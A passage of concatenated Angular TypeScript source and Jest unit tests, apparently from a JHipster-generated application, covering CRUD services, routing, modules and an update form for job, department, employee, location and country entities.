expect(mockActiveModal.dismiss).toHaveBeenCalled();
});
});
});
});
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
@Injectable({ providedIn: 'root' })
export class DepartmentMySuffixRoutingResolveService implements Resolve<IDepartmentMySuffix> {
constructor(protected service: DepartmentMySuffixService, protected router: Router) {}
resolve(route: ActivatedRouteSnapshot): Observable<IDepartmentMySuffix> | Observable<never> {
const id = route.params['id'];
if (id) {
return this.service.find(id).pipe(
mergeMap((department: HttpResponse<DepartmentMySuffix>) => {
if (department.body) {
return of(department.body);
} else {
this.router.navigate(['404']);
return EMPTY;
}
})
);
}
return of(new DepartmentMySuffix());
}
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { JobHistoryMySuffixService } from '../service/job-history-my-suffix.service';
import { IJobHistoryMySuffix, JobHistoryMySuffix } from '../job-history-my-suffix.model';
import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
import { JobMySuffixService } from 'app/entities/job-my-suffix/service/job-my-suffix.service';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { DepartmentMySuffixService } from 'app/entities/department-my-suffix/service/department-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
import { JobHistoryMySuffixUpdateComponent } from './job-history-my-suffix-update.component';
describe('Component Tests', () => {
describe('JobHistoryMySuffix Management Update Component', () => {
let comp: JobHistoryMySuffixUpdateComponent;
let fixture: ComponentFixture<JobHistoryMySuffixUpdateComponent>;
let activatedRoute: ActivatedRoute;
let jobHistoryService: JobHistoryMySuffixService;
let jobService: JobMySuffixService;
let departmentService: DepartmentMySuffixService;
let employeeService: EmployeeMySuffixService;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
declarations: [JobHistoryMySuffixUpdateComponent],
providers: [FormBuilder, ActivatedRoute],
})
.overrideTemplate(JobHistoryMySuffixUpdateComponent, '')
.compileComponents();
fixture = TestBed.createComponent(JobHistoryMySuffixUpdateComponent);
activatedRoute = TestBed.inject(ActivatedRoute);
jobHistoryService = TestBed.inject(JobHistoryMySuffixService);
jobService = TestBed.inject(JobMySuffixService);
departmentService = TestBed.inject(DepartmentMySuffixService);
employeeService = TestBed.inject(EmployeeMySuffixService);
comp = fixture.componentInstance;
});
describe('ngOnInit', () => {
it('Should call job query and add missing value', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
const job: IJobMySuffix = { id: 'hacking maximize' };
jobHistory.job = job;
const jobCollection: IJobMySuffix[] = [{ id: 'deposit' }];
spyOn(jobService, 'query').and.returnValue(of(new HttpResponse({ body: jobCollection })));
const expectedCollection: IJobMySuffix[] = [job, ...jobCollection];
spyOn(jobService, 'addJobMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ jobHistory });
comp.ngOnInit();
expect(jobService.query).toHaveBeenCalled();
expect(jobService.addJobMySuffixToCollectionIfMissing).toHaveBeenCalledWith(jobCollection, job);
expect(comp.jobsCollection).toEqual(expectedCollection);
});
it('Should call department query and add missing value', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
const department: IDepartmentMySuffix = { id: 'CFA' };
jobHistory.department = department;
const departmentCollection: IDepartmentMySuffix[] = [{ id: 'Tasty' }];
spyOn(departmentService, 'query').and.returnValue(of(new HttpResponse({ body: departmentCollection })));
const expectedCollection: IDepartmentMySuffix[] = [department, ...departmentCollection];
spyOn(departmentService, 'addDepartmentMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ jobHistory });
comp.ngOnInit();
expect(departmentService.query).toHaveBeenCalled();
expect(departmentService.addDepartmentMySuffixToCollectionIfMissing).toHaveBeenCalledWith(departmentCollection, department);
expect(comp.departmentsCollection).toEqual(expectedCollection);
});
it('Should call employee query and add missing value', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
const employee: IEmployeeMySuffix = { id: 'reinvent orchestrate' };
jobHistory.employee = employee;
const employeeCollection: IEmployeeMySuffix[] = [{ id: 'Africa synergy Albania' }];
spyOn(employeeService, 'query').and.returnValue(of(new HttpResponse({ body: employeeCollection })));
const expectedCollection: IEmployeeMySuffix[] = [employee, ...employeeCollection];
spyOn(employeeService, 'addEmployeeMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);
activatedRoute.data = of({ jobHistory });
comp.ngOnInit();
expect(employeeService.query).toHaveBeenCalled();
expect(employeeService.addEmployeeMySuffixToCollectionIfMissing).toHaveBeenCalledWith(employeeCollection, employee);
expect(comp.employeesCollection).toEqual(expectedCollection);
});
it('Should update editForm', () => {
const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
const job: IJobMySuffix = { id: 'ubiquitous' };
jobHistory.job = job;
const department: IDepartmentMySuffix = { id: 'web-readiness Iraq Cloned' };
jobHistory.department = department;
const employee: IEmployeeMySuffix = { id: 'mobile Granite' };
jobHistory.employee = employee;
activatedRoute.data = of({ jobHistory });
comp.ngOnInit();
expect(comp.editForm.value).toEqual(expect.objectContaining(jobHistory));
expect(comp.jobsCollection).toContain(job);
expect(comp.departmentsCollection).toContain(department);
expect(comp.employeesCollection).toContain(employee);
});
});
describe('save', () => {
it('Should call update service on save for existing entity', () => {
// GIVEN
const saveSubject = new Subject();
const jobHistory = { id: 'ABC' };
spyOn(jobHistoryService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ jobHistory });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: jobHistory }));
saveSubject.complete();
// THEN
expect(comp.previousState).toHaveBeenCalled();
expect(jobHistoryService.update).toHaveBeenCalledWith(jobHistory);
expect(comp.isSaving).toEqual(false);
});
it('Should call create service on save for new entity', () => {
// GIVEN
const saveSubject = new Subject();
const jobHistory = new JobHistoryMySuffix();
spyOn(jobHistoryService, 'create').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ jobHistory });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.next(new HttpResponse({ body: jobHistory }));
saveSubject.complete();
// THEN
expect(jobHistoryService.create).toHaveBeenCalledWith(jobHistory);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).toHaveBeenCalled();
});
it('Should set isSaving to false on error', () => {
// GIVEN
const saveSubject = new Subject();
const jobHistory = { id: 'ABC' };
spyOn(jobHistoryService, 'update').and.returnValue(saveSubject);
spyOn(comp, 'previousState');
activatedRoute.data = of({ jobHistory });
comp.ngOnInit();
// WHEN
comp.save();
expect(comp.isSaving).toEqual(true);
saveSubject.error('This is an error!');
// THEN
expect(jobHistoryService.update).toHaveBeenCalledWith(jobHistory);
expect(comp.isSaving).toEqual(false);
expect(comp.previousState).not.toHaveBeenCalled();
});
});
describe('Tracking relationships identifiers', () => {
describe('trackJobMySuffixById', () => {
it('Should return tracked JobMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackJobMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
describe('trackDepartmentMySuffixById', () => {
it('Should return tracked DepartmentMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackDepartmentMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
describe('trackEmployeeMySuffixById', () => {
it('Should return tracked EmployeeMySuffix primary key', () => {
const entity = { id: 'ABC' };
const trackResult = comp.trackEmployeeMySuffixById(0, entity);
expect(trackResult).toEqual(entity.id);
});
});
});
});
});
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { ILocationMySuffix, LocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from './location-my-suffix.service';
describe('Service Tests', () => {
describe('LocationMySuffix Service', () => {
let service: LocationMySuffixService;
let httpMock: HttpTestingController;
let elemDefault: ILocationMySuffix;
let expectedResult: ILocationMySuffix | ILocationMySuffix[] | boolean | null;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
});
expectedResult = null;
service = TestBed.inject(LocationMySuffixService);
httpMock = TestBed.inject(HttpTestingController);
elemDefault = {
id: 'AAAAAAA',
streetAddress: 'AAAAAAA',
postalCode: 'AAAAAAA',
city: 'AAAAAAA',
stateProvince: 'AAAAAAA',
};
});
describe('Service methods', () => {
it('should find an element', () => {
const returnedFromService = Object.assign({}, elemDefault);
service.find('ABC').subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(elemDefault);
});
it('should create a LocationMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'ID',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.create(new LocationMySuffix()).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'POST' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should update a LocationMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
streetAddress: 'BBBBBB',
postalCode: 'BBBBBB',
city: 'BBBBBB',
stateProvince: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.update(expected).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PUT' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should partial update a LocationMySuffix', () => {
const patchObject = Object.assign(
{
streetAddress: 'BBBBBB',
city: 'BBBBBB',
},
new LocationMySuffix()
);
const returnedFromService = Object.assign(patchObject, elemDefault);
const expected = Object.assign({}, returnedFromService);
service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PATCH' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should return a list of LocationMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
streetAddress: 'BBBBBB',
postalCode: 'BBBBBB',
city: 'BBBBBB',
stateProvince: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.query().subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush([returnedFromService]);
httpMock.verify();
expect(expectedResult).toContainEqual(expected);
});
it('should delete a LocationMySuffix', () => {
service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));
const req = httpMock.expectOne({ method: 'DELETE' });
req.flush({ status: 200 });
expect(expectedResult);
});
describe('addLocationMySuffixToCollectionIfMissing', () => {
it('should add a LocationMySuffix to an empty array', () => {
const location: ILocationMySuffix = { id: 'ABC' };
expectedResult = service.addLocationMySuffixToCollectionIfMissing([], location);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(location);
});
it('should not add a LocationMySuffix to an array that contains it', () => {
const location: ILocationMySuffix = { id: 'ABC' };
const locationCollection: ILocationMySuffix[] = [
{
...location,
},
{ id: 'CBA' },
];
expectedResult = service.addLocationMySuffixToCollectionIfMissing(locationCollection, location);
expect(expectedResult).toHaveLength(2);
});
it("should add a LocationMySuffix to an array that doesn't contain it", () => {
const location: ILocationMySuffix = { id: 'ABC' };
const locationCollection: ILocationMySuffix[] = [{ id: 'CBA' }];
expectedResult = service.addLocationMySuffixToCollectionIfMissing(locationCollection, location);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(location);
});
it('should add only unique LocationMySuffix to an array', () => {
const locationArray: ILocationMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Grocery the program' }];
const locationCollection: ILocationMySuffix[] = [{ id: 'ABC' }];
expectedResult = service.addLocationMySuffixToCollectionIfMissing(locationCollection, ...locationArray);
expect(expectedResult).toHaveLength(3);
});
it('should accept varargs', () => {
const location: ILocationMySuffix = { id: 'ABC' };
const location2: ILocationMySuffix = { id: 'CBA' };
expectedResult = service.addLocationMySuffixToCollectionIfMissing([], location, location2);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(location);
expect(expectedResult).toContain(location2);
});
it('should accept null and undefined values', () => {
const location: ILocationMySuffix = { id: 'ABC' };
expectedResult = service.addLocationMySuffixToCollectionIfMissing([], null, location, undefined);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(location);
});
});
});
afterEach(() => {
httpMock.verify();
});
});
});
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { RegionMySuffixComponent } from '../list/region-my-suffix.component';
import { RegionMySuffixDetailComponent } from '../detail/region-my-suffix-detail.component';
import { RegionMySuffixUpdateComponent } from '../update/region-my-suffix-update.component';
import { RegionMySuffixRoutingResolveService } from './region-my-suffix-routing-resolve.service';
const regionRoute: Routes = [
{
path: '',
component: RegionMySuffixComponent,
canActivate: [UserRouteAccessService],
},
{
path: ':id/view',
component: RegionMySuffixDetailComponent,
resolve: {
region: RegionMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: 'new',
component: RegionMySuffixUpdateComponent,
resolve: {
region: RegionMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: ':id/edit',
component: RegionMySuffixUpdateComponent,
resolve: {
region: RegionMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
];
@NgModule({
imports: [RouterModule.forChild(regionRoute)],
exports: [RouterModule],
})
export class RegionMySuffixRoutingModule {}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { JobHistoryMySuffixComponent } from './list/job-history-my-suffix.component';
import { JobHistoryMySuffixDetailComponent } from './detail/job-history-my-suffix-detail.component';
import { JobHistoryMySuffixUpdateComponent } from './update/job-history-my-suffix-update.component';
import { JobHistoryMySuffixDeleteDialogComponent } from './delete/job-history-my-suffix-delete-dialog.component';
import { JobHistoryMySuffixRoutingModule } from './route/job-history-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, JobHistoryMySuffixRoutingModule],
declarations: [
JobHistoryMySuffixComponent,
JobHistoryMySuffixDetailComponent,
JobHistoryMySuffixUpdateComponent,
JobHistoryMySuffixDeleteDialogComponent,
],
entryComponents: [JobHistoryMySuffixDeleteDialogComponent],
})
export class JobHistoryMySuffixModule {}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { map } from 'rxjs/operators';
import * as dayjs from 'dayjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IJobHistoryMySuffix, getJobHistoryMySuffixIdentifier } from '../job-history-my-suffix.model';
export type EntityResponseType = HttpResponse<IJobHistoryMySuffix>;
export type EntityArrayResponseType = HttpResponse<IJobHistoryMySuffix[]>;
@Injectable({ providedIn: 'root' })
export class JobHistoryMySuffixService {
public resourceUrl = this.applicationConfigService.getEndpointFor('api/job-histories');
constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}
create(jobHistory: IJobHistoryMySuffix): Observable<EntityResponseType> {
const copy = this.convertDateFromClient(jobHistory);
return this.http
.post<IJobHistoryMySuffix>(this.resourceUrl, copy, { observe: 'response' })
.pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
}
update(jobHistory: IJobHistoryMySuffix): Observable<EntityResponseType> {
const copy = this.convertDateFromClient(jobHistory);
return this.http
.put<IJobHistoryMySuffix>(`${this.resourceUrl}/${getJobHistoryMySuffixIdentifier(jobHistory) as string}`, copy, {
observe: 'response',
})
.pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
}
partialUpdate(jobHistory: IJobHistoryMySuffix): Observable<EntityResponseType> {
const copy = this.convertDateFromClient(jobHistory);
return this.http
.patch<IJobHistoryMySuffix>(`${this.resourceUrl}/${getJobHistoryMySuffixIdentifier(jobHistory) as string}`, copy, {
observe: 'response',
})
.pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
}
find(id: string): Observable<EntityResponseType> {
return this.http
.get<IJobHistoryMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' })
.pipe(map((res: EntityResponseType) => this.convertDateFromServer(res)));
}
query(req?: any): Observable<EntityArrayResponseType> {
const options = createRequestOption(req);
return this.http
.get<IJobHistoryMySuffix[]>(this.resourceUrl, { params: options, observe: 'response' })
.pipe(map((res: EntityArrayResponseType) => this.convertDateArrayFromServer(res)));
}
delete(id: string): Observable<HttpResponse<{}>> {
return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
}
addJobHistoryMySuffixToCollectionIfMissing(
jobHistoryCollection: IJobHistoryMySuffix[],
...jobHistoriesToCheck: (IJobHistoryMySuffix | null | undefined)[]
): IJobHistoryMySuffix[] {
const jobHistories: IJobHistoryMySuffix[] = jobHistoriesToCheck.filter(isPresent);
if (jobHistories.length > 0) {
const jobHistoryCollectionIdentifiers = jobHistoryCollection.map(jobHistoryItem => getJobHistoryMySuffixIdentifier(jobHistoryItem)!);
const jobHistoriesToAdd = jobHistories.filter(jobHistoryItem => {
const jobHistoryIdentifier = getJobHistoryMySuffixIdentifier(jobHistoryItem);
if (jobHistoryIdentifier == null || jobHistoryCollectionIdentifiers.includes(jobHistoryIdentifier)) {
return false;
}
jobHistoryCollectionIdentifiers.push(jobHistoryIdentifier);
return true;
});
return [...jobHistoriesToAdd, ...jobHistoryCollection];
}
return jobHistoryCollection;
}
protected convertDateFromClient(jobHistory: IJobHistoryMySuffix): IJobHistoryMySuffix {
return Object.assign({}, jobHistory, {
startDate: jobHistory.startDate?.isValid() ? jobHistory.startDate.toJSON() : undefined,
endDate: jobHistory.endDate?.isValid() ? jobHistory.endDate.toJSON() : undefined,
});
}
protected convertDateFromServer(res: EntityResponseType): EntityResponseType {
if (res.body) {
res.body.startDate = res.body.startDate ? dayjs(res.body.startDate) : undefined;
res.body.endDate = res.body.endDate ? dayjs(res.body.endDate) : undefined;
}
return res;
}
protected convertDateArrayFromServer(res: EntityArrayResponseType): EntityArrayResponseType {
if (res.body) {
res.body.forEach((jobHistory: IJobHistoryMySuffix) => {
jobHistory.startDate = jobHistory.startDate ? dayjs(jobHistory.startDate) : undefined;
jobHistory.endDate = jobHistory.endDate ? dayjs(jobHistory.endDate) : undefined;
});
}
return res;
}
}
<file_sep>import { ICountryMySuffix } from 'app/entities/country-my-suffix/country-my-suffix.model';
export interface ILocationMySuffix {
id?: string;
streetAddress?: string | null;
postalCode?: string | null;
city?: string | null;
stateProvince?: string | null;
country?: ICountryMySuffix | null;
}
export class LocationMySuffix implements ILocationMySuffix {
constructor(
public id?: string,
public streetAddress?: string | null,
public postalCode?: string | null,
public city?: string | null,
public stateProvince?: string | null,
public country?: ICountryMySuffix | null
) {}
}
export function getLocationMySuffixIdentifier(location: ILocationMySuffix): string | undefined {
return location.id;
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IJobMySuffix, getJobMySuffixIdentifier } from '../job-my-suffix.model';
export type EntityResponseType = HttpResponse<IJobMySuffix>;
export type EntityArrayResponseType = HttpResponse<IJobMySuffix[]>;
@Injectable({ providedIn: 'root' })
export class JobMySuffixService {
public resourceUrl = this.applicationConfigService.getEndpointFor('api/jobs');
constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}
create(job: IJobMySuffix): Observable<EntityResponseType> {
return this.http.post<IJobMySuffix>(this.resourceUrl, job, { observe: 'response' });
}
update(job: IJobMySuffix): Observable<EntityResponseType> {
return this.http.put<IJobMySuffix>(`${this.resourceUrl}/${getJobMySuffixIdentifier(job) as string}`, job, { observe: 'response' });
}
partialUpdate(job: IJobMySuffix): Observable<EntityResponseType> {
return this.http.patch<IJobMySuffix>(`${this.resourceUrl}/${getJobMySuffixIdentifier(job) as string}`, job, { observe: 'response' });
}
find(id: string): Observable<EntityResponseType> {
return this.http.get<IJobMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' });
}
query(req?: any): Observable<EntityArrayResponseType> {
const options = createRequestOption(req);
return this.http.get<IJobMySuffix[]>(this.resourceUrl, { params: options, observe: 'response' });
}
delete(id: string): Observable<HttpResponse<{}>> {
return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
}
addJobMySuffixToCollectionIfMissing(jobCollection: IJobMySuffix[], ...jobsToCheck: (IJobMySuffix | null | undefined)[]): IJobMySuffix[] {
const jobs: IJobMySuffix[] = jobsToCheck.filter(isPresent);
if (jobs.length > 0) {
const jobCollectionIdentifiers = jobCollection.map(jobItem => getJobMySuffixIdentifier(jobItem)!);
const jobsToAdd = jobs.filter(jobItem => {
const jobIdentifier = getJobMySuffixIdentifier(jobItem);
if (jobIdentifier == null || jobCollectionIdentifiers.includes(jobIdentifier)) {
return false;
}
jobCollectionIdentifiers.push(jobIdentifier);
return true;
});
return [...jobsToAdd, ...jobCollection];
}
return jobCollection;
}
}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { FormBuilder, Validators } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs';
import { finalize, map } from 'rxjs/operators';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
import { ILocationMySuffix } from 'app/entities/location-my-suffix/location-my-suffix.model';
import { LocationMySuffixService } from 'app/entities/location-my-suffix/service/location-my-suffix.service';
@Component({
selector: 'jhi-department-my-suffix-update',
templateUrl: './department-my-suffix-update.component.html',
})
export class DepartmentMySuffixUpdateComponent implements OnInit {
isSaving = false;
locationsCollection: ILocationMySuffix[] = [];
editForm = this.fb.group({
id: [],
departmentName: [null, [Validators.required]],
location: [],
});
constructor(
protected departmentService: DepartmentMySuffixService,
protected locationService: LocationMySuffixService,
protected activatedRoute: ActivatedRoute,
protected fb: FormBuilder
) {}
ngOnInit(): void {
this.activatedRoute.data.subscribe(({ department }) => {
this.updateForm(department);
this.loadRelationshipsOptions();
});
}
previousState(): void {
window.history.back();
}
save(): void {
this.isSaving = true;
const department = this.createFromForm();
if (department.id !== undefined) {
this.subscribeToSaveResponse(this.departmentService.update(department));
} else {
this.subscribeToSaveResponse(this.departmentService.create(department));
}
}
trackLocationMySuffixById(index: number, item: ILocationMySuffix): string {
return item.id!;
}
protected subscribeToSaveResponse(result: Observable<HttpResponse<IDepartmentMySuffix>>): void {
result.pipe(finalize(() => this.onSaveFinalize())).subscribe(
() => this.onSaveSuccess(),
() => this.onSaveError()
);
}
protected onSaveSuccess(): void {
this.previousState();
}
protected onSaveError(): void {
// Api for inheritance.
}
protected onSaveFinalize(): void {
this.isSaving = false;
}
protected updateForm(department: IDepartmentMySuffix): void {
this.editForm.patchValue({
id: department.id,
departmentName: department.departmentName,
location: department.location,
});
this.locationsCollection = this.locationService.addLocationMySuffixToCollectionIfMissing(this.locationsCollection, department.location);
}
protected loadRelationshipsOptions(): void {
this.locationService
.query({ filter: 'department-is-null' })
.pipe(map((res: HttpResponse<ILocationMySuffix[]>) => res.body ?? []))
.pipe(
map((locations: ILocationMySuffix[]) =>
this.locationService.addLocationMySuffixToCollectionIfMissing(locations, this.editForm.get('location')!.value)
)
)
.subscribe((locations: ILocationMySuffix[]) => (this.locationsCollection = locations));
}
protected createFromForm(): IDepartmentMySuffix {
return {
...new DepartmentMySuffix(),
id: this.editForm.get(['id'])!.value,
departmentName: this.editForm.get(['departmentName'])!.value,
location: this.editForm.get(['location'])!.value,
};
}
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { EmployeeMySuffixComponent } from './list/employee-my-suffix.component';
import { EmployeeMySuffixDetailComponent } from './detail/employee-my-suffix-detail.component';
import { EmployeeMySuffixUpdateComponent } from './update/employee-my-suffix-update.component';
import { EmployeeMySuffixDeleteDialogComponent } from './delete/employee-my-suffix-delete-dialog.component';
import { EmployeeMySuffixRoutingModule } from './route/employee-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, EmployeeMySuffixRoutingModule],
declarations: [
EmployeeMySuffixComponent,
EmployeeMySuffixDetailComponent,
EmployeeMySuffixUpdateComponent,
EmployeeMySuffixDeleteDialogComponent,
],
entryComponents: [EmployeeMySuffixDeleteDialogComponent],
})
export class EmployeeMySuffixModule {}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { ICountryMySuffix, CountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from './country-my-suffix.service';
describe('Service Tests', () => {
describe('CountryMySuffix Service', () => {
let service: CountryMySuffixService;
let httpMock: HttpTestingController;
let elemDefault: ICountryMySuffix;
let expectedResult: ICountryMySuffix | ICountryMySuffix[] | boolean | null;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
});
expectedResult = null;
service = TestBed.inject(CountryMySuffixService);
httpMock = TestBed.inject(HttpTestingController);
elemDefault = {
id: 'AAAAAAA',
countryName: 'AAAAAAA',
};
});
describe('Service methods', () => {
it('should find an element', () => {
const returnedFromService = Object.assign({}, elemDefault);
service.find('ABC').subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(elemDefault);
});
it('should create a CountryMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'ID',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.create(new CountryMySuffix()).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'POST' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should update a CountryMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
countryName: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.update(expected).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PUT' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should partial update a CountryMySuffix', () => {
const patchObject = Object.assign(
{
countryName: 'BBBBBB',
},
new CountryMySuffix()
);
const returnedFromService = Object.assign(patchObject, elemDefault);
const expected = Object.assign({}, returnedFromService);
service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PATCH' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should return a list of CountryMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
countryName: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.query().subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush([returnedFromService]);
httpMock.verify();
expect(expectedResult).toContainEqual(expected);
});
it('should delete a CountryMySuffix', () => {
service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));
const req = httpMock.expectOne({ method: 'DELETE' });
req.flush({ status: 200 });
expect(expectedResult);
});
describe('addCountryMySuffixToCollectionIfMissing', () => {
it('should add a CountryMySuffix to an empty array', () => {
const country: ICountryMySuffix = { id: 'ABC' };
expectedResult = service.addCountryMySuffixToCollectionIfMissing([], country);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(country);
});
it('should not add a CountryMySuffix to an array that contains it', () => {
const country: ICountryMySuffix = { id: 'ABC' };
const countryCollection: ICountryMySuffix[] = [
{
...country,
},
{ id: 'CBA' },
];
expectedResult = service.addCountryMySuffixToCollectionIfMissing(countryCollection, country);
expect(expectedResult).toHaveLength(2);
});
it("should add a CountryMySuffix to an array that doesn't contain it", () => {
const country: ICountryMySuffix = { id: 'ABC' };
const countryCollection: ICountryMySuffix[] = [{ id: 'CBA' }];
expectedResult = service.addCountryMySuffixToCollectionIfMissing(countryCollection, country);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(country);
});
it('should add only unique CountryMySuffix to an array', () => {
const countryArray: ICountryMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Stravenue Usability' }];
const countryCollection: ICountryMySuffix[] = [{ id: 'ABC' }];
expectedResult = service.addCountryMySuffixToCollectionIfMissing(countryCollection, ...countryArray);
expect(expectedResult).toHaveLength(3);
});
it('should accept varargs', () => {
const country: ICountryMySuffix = { id: 'ABC' };
const country2: ICountryMySuffix = { id: 'CBA' };
expectedResult = service.addCountryMySuffixToCollectionIfMissing([], country, country2);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(country);
expect(expectedResult).toContain(country2);
});
it('should accept null and undefined values', () => {
const country: ICountryMySuffix = { id: 'ABC' };
expectedResult = service.addCountryMySuffixToCollectionIfMissing([], null, country, undefined);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(country);
});
});
});
afterEach(() => {
httpMock.verify();
});
});
});
